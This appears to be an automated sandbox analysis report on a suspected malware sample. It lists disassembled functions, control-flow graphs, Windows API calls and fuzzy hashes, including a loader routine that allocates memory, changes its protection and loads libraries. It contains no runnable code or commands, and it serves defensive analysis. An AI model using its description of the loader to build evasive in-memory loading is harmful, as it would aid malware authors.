                                                                                                                                                                                                                                                                                          control_flow_graph 598 41bea0-41bebd 599 41bee0-41bef9 call 41c690 598->599 600 41bf10-41bf23 598->600 601 41bf30 598->601 602 41bf32-41bf3e 598->602 603 41bf45-41bf71 598->603 604 41bec4-41bed6 598->604 605 41bf0b 598->605 608 41befe-41bf04 599->608 600->601 602->599 602->600 602->601 602->602 602->603 602->605 607 41bf80-41bfa4 603->607 604->599 604->600 604->601 604->602 604->603 604->605 605->600 607->607 609 41bfa6-41c004 call 414070 607->609 608->600 608->601 608->602 608->605 612 41c010-41c045 609->612 612->612 613 41c047-41c0a8 call 414070 612->613 616 41c0b0-41c10b 613->616 616->616 617 41c10d-41c193 call 414070 616->617 620 41c1a0-41c1c8 617->620 620->620 621 41c1ca-41c202 call 414070 620->621 624 41c210-41c278 621->624 624->624 625 41c27a-41c2ba call 414070 624->625 628 41c2c1-41c2c9 625->628 629 41c671 625->629 630 41c680-41c689 625->630 631 41c662-41c668 call 407f70 625->631 632 41c677-41c67d call 407f70 625->632 635 41c2d0-41c2d9 628->635 629->632 631->629 632->630 635->635 638 41c2db-41c2de 635->638 639 41c2e0-41c2e5 638->639 640 41c2e7 638->640 641 41c2ea-41c359 call 407f60 639->641 640->641 644 41c360-41c38b 641->644 644->644 645 41c38d-41c395 644->645 646 41c3b1-41c3be 645->646 647 41c397-41c39f 645->647 649 41c3c0-41c3c7 646->649 650 41c3e3 646->650 648 41c3a0-41c3af 647->648 648->646 648->648 651 41c3d0-41c3df 649->651 652 41c3e6-41c3f6 650->652 651->651 653 41c3e1 651->653 654 41c400-41c409 652->654 653->652 654->654 655 41c40b-41c412 654->655 656 41c420-41c429 655->656 656->656 657 41c42b-41c437 656->657 658 41c440-41c442 657->658 659 41c439-41c43e 657->659 660 41c449-41c45a call 407f60 658->660 659->660 663 41c481-41c493 660->663 664 41c45c-41c461 660->664 666 41c4a0-41c4b9 663->666 665 41c470-41c47f 664->665 665->663 665->665 666->666 667 41c4bb-41c4f7 666->667 668 41c500-41c530 667->668 668->668 669 41c532-41c53b 668->669 670 41c551-41c562 669->670 671 41c53d 669->671 672 41c581-41c595 670->672 673 41c564-41c568 670->673 674 41c540-41c54f 671->674 676 41c5a0-41c62d 672->676 675 41c570-41c57f 673->675 674->670 674->674 675->672 675->675 676->676 677 41c633-41c65a call 420df0 676->677 677->631
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                                                          • API String ID: 0-3020956940
                                                                                                                                                                                                                                                                                          • Opcode ID: 48fb5841e8fc15a65971b2ccce4c7675603372e0af0c1bd974a24fdc44b1d18f
                                                                                                                                                                                                                                                                                          • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48fb5841e8fc15a65971b2ccce4c7675603372e0af0c1bd974a24fdc44b1d18f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                                                          Function 008EA28E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 702 8ea28e-8ea2a7 703 8ea2a9-8ea2ab 702->703 704 8ea2ad 703->704 705 8ea2b2-8ea2be CreateToolhelp32Snapshot 703->705 704->705 706 8ea2ce-8ea2db Module32First 705->706 707 8ea2c0-8ea2c6 705->707 708 8ea2dd-8ea2de call 8e9f4d 706->708 709 8ea2e4-8ea2ec 706->709 707->706 712 8ea2c8-8ea2cc 707->712 713 8ea2e3 708->713 712->703 712->706 713->709
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008EA2B6
                                                                                                                                                                                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 008EA2D6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E9000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_8e9000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                          • Instruction ID: 446f05686b06b366b5dc5742394b3759a2e45eff39792ad976531dd9c98e486f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F062316007547BD7243ABA988DA6A76E8FF4AB24F100529F646E10C0DA71FC454A62
                                                                                                                                                                                                                                                                                          Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 718 43cb20-43cb34 719 43cb40-43cb49 718->719 719->719 720 43cb4b-43cb5f 719->720 721 43cb61-43cb66 720->721 722 43cb68 720->722 723 43cb6f-43cb96 call 407f60 721->723 722->723 726 43cbb1-43cc1f 723->726 727 43cb98-43cb9b 723->727 728 43cc20-43cc34 726->728 729 43cba0-43cbaf 727->729 728->728 730 43cc36-43cc42 728->730 729->726 729->729 731 43cc44-43cc4f 730->731 732 43cc89-43cc97 call 407f70 730->732 733 43cc50-43cc57 731->733 740 43cc99-43cc9d 732->740 741 43cc9f-43cca8 732->741 735 43cc60-43cc66 733->735 736 43cc59-43cc5c 733->736 735->732 739 43cc68-43cc7d call 43a9b0 735->739 736->733 738 43cc5e 736->738 738->732 743 43cc82-43cc87 739->743 740->741 743->732
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                                                          • Opcode ID: 2e85ccf3c634bb8eb18bb8f5a370902e051506c7f06aba8c0c1ef036a9d8f182
                                                                                                                                                                                                                                                                                          • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e85ccf3c634bb8eb18bb8f5a370902e051506c7f06aba8c0c1ef036a9d8f182
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                                                          Function 0040B44C Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: h d"
                                                                                                                                                                                                                                                                                          • API String ID: 0-862628183
                                                                                                                                                                                                                                                                                          • Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                                                          • Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18
                                                                                                                                                                                                                                                                                          Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                                          Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                                          • Opcode ID: aa3d1f857265f2d1eec240e1ce09a33a68e210528346f5167762aa40738f4e39
                                                                                                                                                                                                                                                                                          • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa3d1f857265f2d1eec240e1ce09a33a68e210528346f5167762aa40738f4e39
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                                                          Function 0040C917 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                                          • Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
                                                                                                                                                                                                                                                                                          Function 0043B05B Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7d951b1bf8575b638b514a071f1e27b8906d3225ac76758bc526cbf2df91afa5
                                                                                                                                                                                                                                                                                          • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d951b1bf8575b638b514a071f1e27b8906d3225ac76758bc526cbf2df91afa5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                                                                          Function 0248003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 83 248003c-2480047 84 2480049 83->84 85 248004c-2480263 call 2480a3f call 2480e0f call 2480d90 VirtualAlloc 83->85 84->85 100 248028b-2480292 85->100 101 2480265-2480289 call 2480a69 85->101 103 24802a1-24802b0 100->103 104 24802ce-24803c2 VirtualProtect call 2480cce call 2480ce7 101->104 103->104 105 24802b2-24802cc 103->105 112 24803d1-24803e0 104->112 105->103 113 2480439-24804b8 VirtualFree 112->113 114 24803e2-2480437 call 2480ce7 112->114 116 24804be-24804cd 113->116 117 24805f4-24805fe 113->117 114->112 119 24804d3-24804dd 116->119 120 248077f-2480789 117->120 121 2480604-248060d 117->121 119->117 126 24804e3-2480505 LoadLibraryA 119->126 124 248078b-24807a3 120->124 125 24807a6-24807b0 120->125 121->120 122 2480613-2480637 121->122 127 248063e-2480648 122->127 124->125 128 248086e-24808be LoadLibraryA 125->128 129 24807b6-24807cb 125->129 130 2480517-2480520 126->130 131 2480507-2480515 126->131 127->120 134 248064e-248065a 127->134 139 24808c7-24808f9 128->139 132 24807d2-24807d5 129->132 133 2480526-2480547 130->133 131->133 135 2480824-2480833 132->135 136 24807d7-24807e0 132->136 137 248054d-2480550 133->137 134->120 138 2480660-248066a 134->138 145 2480839-248083c 135->145 140 24807e2 136->140 141 24807e4-2480822 136->141 142 24805e0-24805ef 137->142 143 2480556-248056b 137->143 144 248067a-2480689 138->144 146 24808fb-2480901 139->146 147 2480902-248091d 139->147 140->135 141->132 142->119 148 248056d 143->148 149 248056f-248057a 143->149 150 248068f-24806b2 144->150 151 2480750-248077a 144->151 145->128 152 248083e-2480847 145->152 146->147 148->142 154 248059b-24805bb 149->154 155 248057c-2480599 149->155 156 24806ef-24806fc 150->156 157 24806b4-24806ed 150->157 151->127 158 2480849 152->158 159 248084b-248086c 152->159 166 24805bd-24805db 154->166 155->166 160 248074b 156->160 161 24806fe-2480748 156->161 157->156 158->128 159->145 160->144 161->160 166->137
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0248024D
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                          • Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14
                                                                                                                                                                                                                                                                                          Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 695 43ab0b-43ab1f 696 43ab20-43ab7b 695->696 696->696 697 43ab7d-43abce GetForegroundWindow call 43c7d0 696->697
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                                          • String ID: ilmn
                                                                                                                                                                                                                                                                                          • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                                                          • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                                          • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286
                                                                                                                                                                                                                                                                                          Function 0040EA11 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 701 40ea11-40eb75 CoInitializeEx * 2
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
                                                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                                                                                                                                                                                          • Instruction ID: 6a516bc968bc721a6a6447d4bb28a67b77a0153a8c52e65a7a5ccdf46234fc14
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41E8B4D10B40AFD370EF39DA4B7127EB4AB05250F504B2EF9E6866D4E231A4198BD7
                                                                                                                                                                                                                                                                                          Function 02480E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 715 2480e0f-2480e24 SetErrorMode * 2 716 2480e2b-2480e2c 715->716 717 2480e26 715->717 717->716
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02480223,?,?), ref: 02480E19
                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02480223,?,?), ref: 02480E1E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                          • Instruction ID: 625e0f7f1e1b302f448508261efaf1e752b234688f5247d6a6466c6c1b929a9e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85D0123215512877D7003A94DC09BDE7B1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                                          Function 0043A950 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                                          • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F
                                                                                                                                                                                                                                                                                          Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
